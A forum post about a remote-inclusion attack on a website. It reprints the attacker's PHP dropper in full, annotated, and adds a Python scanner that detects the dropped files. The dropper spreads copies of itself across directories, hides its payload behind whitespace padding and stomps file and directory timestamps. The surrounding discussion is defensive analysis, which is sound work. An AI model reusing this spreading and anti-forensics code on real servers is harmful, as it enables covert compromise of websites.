namogofer.php hacking attempt
Posted: Mon Mar 10, 2008 4:30 pm
I have noticed this hacking attempt at one of our websites. It gives a weird error in the log (about 26k lines in 10 seconds) similar to this:
[client 196.28.230.50] [Time: Mon Mar 10 2008 15:50:38] PHP Notice: Undefined variable: CURFILE in http://www.elettrodataservice.it/foto_a ... aca/a/.php on line 101\n
What this seems to do is hit the website and then execute the script at this address. I have gone and manually denied anything from this IP, but it appears it spreads based on other sites. The code that is available at this link is below.
Is there anything that you may have come across to best lock this down to prevent these attacks? It seems it tries to create these namogofer files and write them to execute something remotely. It can only write to stuff outside the web tree, so PHP isn't executable there without the command line, but I would like to secure the site as best as possible to prevent anything from going wrong because of this.
Checking other logs, it appears to be doing a POST to root directories, e.g. /var, /usr, etc.
Code:
<?php
// Dropper script as recovered from the attacking host. Comments were added by the
// editor for readability; the logic is left exactly as posted.
error_reporting(1);                        // E_ERROR only: keep warnings out of the victim's log
global $HTTP_SERVER_VARS;                  // pre-PHP 5.4 alias of $_SERVER
$START = time();
$WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0);    // seconds allowed per directory depth before giving up

// Write $data to $f, then restore the file's and its parent directory's mtime/atime
// so the drop does not show up in "ls -lt" or "find -newer". If $f did not exist,
// clone owner, group, permissions and timestamps from the currently running script.
function my_fwrite($f,$data) {
    global $CURFILE;
    $file_mtime = @filemtime($f);
    $file_atime = @fileatime($f);
    $dir_mtime = @filemtime(@dirname($f));
    $dir_atime = @fileatime(@dirname($f));
    if ($file_h = @fopen($f,"wb")){
        @fwrite($file_h,$data);
        @fclose($file_h);
        if ($file_mtime){
            @touch($f,$file_mtime,$file_atime);            // timestamp stomping on overwrite
        }elseif(@filemtime($CURFILE)){
            @chmod($f,@fileperms($CURFILE));
            @touch($f,@filemtime($CURFILE),@fileatime($CURFILE));
            @chgrp($f,@filegroup($CURFILE));
            @chown($f,@fileowner($CURFILE));
        };
        if ($dir_mtime)
            @touch(@dirname($f),$dir_mtime,$dir_atime);    // hide the directory change too
        return $f;
    }else{
        return '';
    };
};

// Extension of a path (text after the last dot).
function ext($f){
    return substr($f, strrpos($f, ".") + 1);
};

// Recursive directory walk with a per-depth time budget. Calls the optional
// callbacks {$func}_s (start of dir), _d (subdir), _f (file) and _e (end of dir).
function walkdir($p,$func='_walkdir',$l=0){
    global $START;
    global $WD_TIMEOUT;
    global $FL;
    $func_f = "{$func}_f";
    $func_d = "{$func}_d";
    $func_s = "{$func}_s";
    $func_e = "{$func}_e";
    if ($dh = @opendir("$p")){
        if (function_exists($func_s)) {
            if ($func_s($p,$l))
                return 1;
        };
        while ($f = @readdir($dh)){
            if (time() - $START >= $WD_TIMEOUT[$l] )
                break;
            if ($f == '.' || $f == '..' )
                continue;
            if (@is_dir ("$p$f/") )
                walkdir("$p$f/",$func,$l+1);
            if (@is_dir ("$p$f/") && function_exists($func_d))
                $func_d("$p$f/",$l);
            if (@is_file("$p$f" ) && function_exists($func_f))
                $func_f("$p$f" ,$l);
        };
        closedir($dh);
        if (function_exists($func_e))
            $func_e($p,$l);
    };
};

// Strip the document root prefix so output paths are relative to the web root.
function r_cut($p){
    global $R;
    return substr($p,strlen($R));
};

function say($t) {
    echo "$t\n";
};

// Prints md5("testdata_start") / md5("testdata_end") so the attacker's client
// can confirm the script really executed on the target.
function testdata($t) {
    say(md5("testdata_$t"));
};

$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME'];
echo "<pre>";
testdata('start');
$fe = ext($CURFILE);
if (!$fe) $fe = 'php';
$FN = "namogofer.$fe";                     // dropped file takes the running script's extension

// Callbacks for walkdir(): count entries per directory, then drop the payload.
function _walkdir_s($d,$l) {
    global $FCNT;
    $FCNT = array('fn' => '','dir' => 0,'file' => 0,'simtype' => 0);
};
function _walkdir_d($d,$l) {
    global $FCNT;
    $FCNT['dir' ]++;
};
// $CURFILE is not declared global here, so it is undefined inside this function;
// this is what produces the "Undefined variable: CURFILE" notice seen in the log.
function _walkdir_f($f,$l) { global $FCNT; $FCNT['file']++;
    if (ext($f) == ext($CURFILE)) $FCNT['simtype']++; };
// At the end of each directory: write at most 7 copies per depth level. The payload
// is wrapped in 100 newlines and 150 spaces on each side so a casual look at the
// top of the file shows nothing. $C is never initialised; PHP treats $C[$l] as 0.
function _walkdir_e($d,$l) {
    global $C,$FCNT,$FN;
    if ($C[$l]<7){
        if (my_fwrite("$d$FN",str_repeat("\n",100).str_repeat(' ',150).base64_decode('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').str_repeat(' ',150)."\n".str_repeat("\n",100))){
            $C[$l]++;
            $FCNT['fn'] = r_cut("$d$FN");
            say(implode("\t",$FCNT));      // report: path, dir count, file count, same-extension count
        };
    };
};
walkdir("$R/");
testdata('end');
echo "</pre>";
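Added example (editor's code, not from the original post or the dropper): a small scanner that looks for files planted the way the script above plants them. It checks three things the posted code makes visible: the file name pattern namogofer.<ext>, the 100-newline plus 150-space padding that my_fwrite() writes before the payload, and timestamp stomping, which touch() cannot hide because it only sets mtime/atime and the kernel updates ctime on every inode change. The sample document root, the stand-in payload, the PAD_MIN and CTIME_GAP thresholds and all function names are the editor's assumptions for this example.

```python
"""Scan a web root for files planted by the namogofer.php-style dropper.

Constructed example: build_sample_root() creates a temp directory with one
clean index.php and one file written the way the dropper writes it
(padding, payload, padding, then mtime/atime backdated with utime).
"""
import os
import re
import tempfile
import time

DROPPER_NAME = re.compile(r"^namogofer\.[A-Za-z0-9]+$")
PAD_MIN = 200            # dropper writes 100 "\n" + 150 " " = 250 bytes of padding
CTIME_GAP = 24 * 3600    # assumed threshold: ctime more than a day newer than mtime


def leading_padding(path, limit=4096):
    """Number of leading whitespace bytes before the first code byte (up to limit)."""
    with open(path, "rb") as fh:
        head = fh.read(limit)
    return len(head) - len(head.lstrip(b" \t\r\n"))


def scan_file(path):
    """Return the list of indicators that fire for one file (empty if clean)."""
    hits = []
    st = os.stat(path)
    if DROPPER_NAME.match(os.path.basename(path)):
        hits.append("name")            # $FN = "namogofer.$fe"
    if leading_padding(path) >= PAD_MIN:
        hits.append("padding")         # str_repeat("\n",100).str_repeat(' ',150)
    # touch() copies mtime/atime from a neighbour but cannot rewrite ctime,
    # so a stomped file has an inode change long after its claimed mtime.
    if st.st_ctime - st.st_mtime > CTIME_GAP:
        hits.append("timestomp")
    return hits


def scan_tree(root):
    """Walk root like the dropper's walkdir() and map relative path -> indicators."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings[rel] = hits
    return findings


def build_sample_root():
    """Constructed fixture: a clean index.php plus one planted namogofer.php."""
    root = tempfile.mkdtemp(prefix="docroot_")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    sub = os.path.join(root, "images")
    os.mkdir(sub)
    planted = os.path.join(sub, "namogofer.php")
    # same layout as my_fwrite(): padding, payload, padding
    payload = "<?php /* constructed stand-in for the elided base64 payload */ ?>"
    with open(planted, "w") as fh:
        fh.write("\n" * 100 + " " * 150 + payload + " " * 150 + "\n" + "\n" * 100)
    # mimic @touch($f, filemtime($CURFILE), fileatime($CURFILE)): backdate
    # mtime/atime by two years; ctime still records the real write time.
    old = time.time() - 2 * 365 * 86400
    os.utime(planted, (old, old))
    return root


if __name__ == "__main__":
    for rel, hits in scan_tree(build_sample_root()).items():
        print(rel, ",".join(hits))
```

On a live box the third check is the one worth running first, since the dropper also resets the parent directory's mtime and so defeats "ls -lt" on directories as well: find DOCROOT -type f -ctime -1 (or -cnewer against a known-good file) lists files whose inode changed recently regardless of what mtime claims.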